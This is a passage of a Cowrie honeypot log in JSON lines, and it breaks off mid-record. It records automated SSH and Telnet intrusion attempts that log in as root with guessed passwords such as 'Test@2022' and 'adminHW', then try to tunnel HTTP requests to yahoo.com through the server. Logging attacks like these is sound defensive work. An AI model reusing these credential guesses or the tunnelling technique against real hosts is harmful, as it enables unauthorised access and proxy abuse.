{"eventid":"cowrie.session.closed","duration":"0.6","message":"Connection lost after 0.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:07:47.116356Z","src_ip":"213.209.150.239","session":"4af19c539369"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":49432,"dst_ip":"1.2.3.4","dst_port":22,"session":"f5c391cebe64","protocol":"ssh","message":"New connection: 213.209.150.239:49432 (1.2.3.4:22) [session: f5c391cebe64]","sensor":"my-vps","timestamp":"2025-08-26T01:07:47.162778Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T01:07:47.163606Z","src_ip":"213.209.150.239","session":"f5c391cebe64"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T01:07:47.210680Z","src_ip":"213.209.150.239","session":"f5c391cebe64"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T01:07:47.446218Z","src_ip":"213.209.150.239","session":"f5c391cebe64"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.231.20","dst_port":80,"src_ip":"213.209.150.239","src_port":13476,"message":"direct-tcp connection request to 74.6.231.20:80 from 127.0.0.1:13476","sensor":"my-vps","timestamp":"2025-08-26T01:07:47.494243Z","session":"f5c391cebe64"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.231.20","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 74.6.231.20:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:07:47.541370Z","src_ip":"213.209.150.239","session":"f5c391cebe64"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:44:3507::8000","dst_port":80,"src_ip":"213.209.150.239","src_port":25686,"message":"direct-tcp connection request to 2001:4998:44:3507::8000:80 from 127.0.0.1:25686","sensor":"my-vps","timestamp":"2025-08-26T01:07:47.677525Z","session":"f5c391cebe64"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:44:3507::8000","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:44:3507::8000:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:07:47.725532Z","src_ip":"213.209.150.239","session":"f5c391cebe64"}
{"eventid":"cowrie.session.closed","duration":"0.6","message":"Connection lost after 0.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:07:47.773670Z","src_ip":"213.209.150.239","session":"f5c391cebe64"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":49492,"dst_ip":"1.2.3.4","dst_port":22,"session":"99d5aa39e6d9","protocol":"ssh","message":"New connection: 213.209.150.239:49492 (1.2.3.4:22) [session: 99d5aa39e6d9]","sensor":"my-vps","timestamp":"2025-08-26T01:07:47.819946Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T01:07:47.821037Z","src_ip":"213.209.150.239","session":"99d5aa39e6d9"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T01:07:47.868201Z","src_ip":"213.209.150.239","session":"99d5aa39e6d9"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T01:07:48.103834Z","src_ip":"213.209.150.239","session":"99d5aa39e6d9"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"98.137.11.163","dst_port":80,"src_ip":"213.209.150.239","src_port":10976,"message":"direct-tcp connection request to 98.137.11.163:80 from 127.0.0.1:10976","sensor":"my-vps","timestamp":"2025-08-26T01:07:48.152125Z","session":"99d5aa39e6d9"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"98.137.11.163","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 98.137.11.163:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:07:48.200071Z","src_ip":"213.209.150.239","session":"99d5aa39e6d9"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:24:120d::1:1","dst_port":80,"src_ip":"213.209.150.239","src_port":32236,"message":"direct-tcp connection request to 2001:4998:24:120d::1:1:80 from 127.0.0.1:32236","sensor":"my-vps","timestamp":"2025-08-26T01:07:48.337605Z","session":"99d5aa39e6d9"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:24:120d::1:1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:24:120d::1:1:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:07:48.384916Z","src_ip":"213.209.150.239","session":"99d5aa39e6d9"}
{"eventid":"cowrie.session.closed","duration":"0.6","message":"Connection lost after 0.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:07:48.432985Z","src_ip":"213.209.150.239","session":"99d5aa39e6d9"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":49553,"dst_ip":"1.2.3.4","dst_port":22,"session":"f168191100bb","protocol":"ssh","message":"New connection: 213.209.150.239:49553 (1.2.3.4:22) [session: f168191100bb]","sensor":"my-vps","timestamp":"2025-08-26T01:07:48.478987Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T01:07:48.479626Z","src_ip":"213.209.150.239","session":"f168191100bb"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T01:07:48.526833Z","src_ip":"213.209.150.239","session":"f168191100bb"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T01:07:48.762336Z","src_ip":"213.209.150.239","session":"f168191100bb"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"98.137.11.163","dst_port":80,"src_ip":"213.209.150.239","src_port":7083,"message":"direct-tcp connection request to 98.137.11.163:80 from 127.0.0.1:7083","sensor":"my-vps","timestamp":"2025-08-26T01:07:48.810522Z","session":"f168191100bb"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"98.137.11.163","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 98.137.11.163:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:07:48.857943Z","src_ip":"213.209.150.239","session":"f168191100bb"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:44:3507::8001","dst_port":80,"src_ip":"213.209.150.239","src_port":18583,"message":"direct-tcp connection request to 2001:4998:44:3507::8001:80 from 127.0.0.1:18583","sensor":"my-vps","timestamp":"2025-08-26T01:07:48.993565Z","session":"f168191100bb"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:44:3507::8001","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:44:3507::8001:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:07:49.040644Z","src_ip":"213.209.150.239","session":"f168191100bb"}
{"eventid":"cowrie.session.closed","duration":"0.6","message":"Connection lost after 0.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:07:49.088571Z","src_ip":"213.209.150.239","session":"f168191100bb"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":49603,"dst_ip":"1.2.3.4","dst_port":22,"session":"d88cab1f45ae","protocol":"ssh","message":"New connection: 213.209.150.239:49603 (1.2.3.4:22) [session: d88cab1f45ae]","sensor":"my-vps","timestamp":"2025-08-26T01:07:49.144426Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T01:07:49.145332Z","src_ip":"213.209.150.239","session":"d88cab1f45ae"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T01:07:49.202545Z","src_ip":"213.209.150.239","session":"d88cab1f45ae"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T01:07:49.486481Z","src_ip":"213.209.150.239","session":"d88cab1f45ae"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.231.21","dst_port":80,"src_ip":"213.209.150.239","src_port":18563,"message":"direct-tcp connection request to 74.6.231.21:80 from 127.0.0.1:18563","sensor":"my-vps","timestamp":"2025-08-26T01:07:49.544128Z","session":"d88cab1f45ae"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.231.21","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 74.6.231.21:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:07:49.602012Z","src_ip":"213.209.150.239","session":"d88cab1f45ae"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:24:120d::1:1","dst_port":80,"src_ip":"213.209.150.239","src_port":21740,"message":"direct-tcp connection request to 2001:4998:24:120d::1:1:80 from 127.0.0.1:21740","sensor":"my-vps","timestamp":"2025-08-26T01:07:49.759175Z","session":"d88cab1f45ae"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:24:120d::1:1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:24:120d::1:1:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:07:49.816089Z","src_ip":"213.209.150.239","session":"d88cab1f45ae"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:07:49.873580Z","src_ip":"213.209.150.239","session":"d88cab1f45ae"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":49677,"dst_ip":"1.2.3.4","dst_port":22,"session":"8b909c3caf0c","protocol":"ssh","message":"New connection: 213.209.150.239:49677 (1.2.3.4:22) [session: 8b909c3caf0c]","sensor":"my-vps","timestamp":"2025-08-26T01:07:49.929373Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T01:07:49.930144Z","src_ip":"213.209.150.239","session":"8b909c3caf0c"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T01:07:49.986958Z","src_ip":"213.209.150.239","session":"8b909c3caf0c"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T01:07:50.269486Z","src_ip":"213.209.150.239","session":"8b909c3caf0c"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"98.137.11.164","dst_port":80,"src_ip":"213.209.150.239","src_port":8918,"message":"direct-tcp connection request to 98.137.11.164:80 from 127.0.0.1:8918","sensor":"my-vps","timestamp":"2025-08-26T01:07:50.327281Z","session":"8b909c3caf0c"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"98.137.11.164","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 98.137.11.164:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:07:50.384051Z","src_ip":"213.209.150.239","session":"8b909c3caf0c"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":35412,"dst_ip":"1.2.3.4","dst_port":23,"session":"a91baadad469","protocol":"telnet","message":"New connection: 212.227.125.160:35412 (1.2.3.4:23) [session: a91baadad469]","sensor":"my-vps","timestamp":"2025-08-26T01:07:50.473407Z"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:124:1507::f001","dst_port":80,"src_ip":"213.209.150.239","src_port":23760,"message":"direct-tcp connection request to 2001:4998:124:1507::f001:80 from 127.0.0.1:23760","sensor":"my-vps","timestamp":"2025-08-26T01:07:50.543071Z","session":"8b909c3caf0c"}
{"eventid":"cowrie.login.success","username":"root","password":"adminHW","message":"login attempt [root/adminHW] succeeded","sensor":"my-vps","timestamp":"2025-08-26T01:07:50.558273Z","src_ip":"212.227.125.160","session":"a91baadad469"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T01:07:50.624449Z","src_ip":"212.227.125.160","session":"a91baadad469"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:124:1507::f001","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:124:1507::f001:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:07:50.625640Z","src_ip":"213.209.150.239","session":"8b909c3caf0c"}
{"eventid":"cowrie.session.closed","duration":"0.8","message":"Connection lost after 0.8 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:07:50.683452Z","src_ip":"213.209.150.239","session":"8b909c3caf0c"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":49746,"dst_ip":"1.2.3.4","dst_port":22,"session":"de4135e46355","protocol":"ssh","message":"New connection: 213.209.150.239:49746 (1.2.3.4:22) [session: de4135e46355]","sensor":"my-vps","timestamp":"2025-08-26T01:07:50.739323Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T01:07:50.740184Z","src_ip":"213.209.150.239","session":"de4135e46355"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh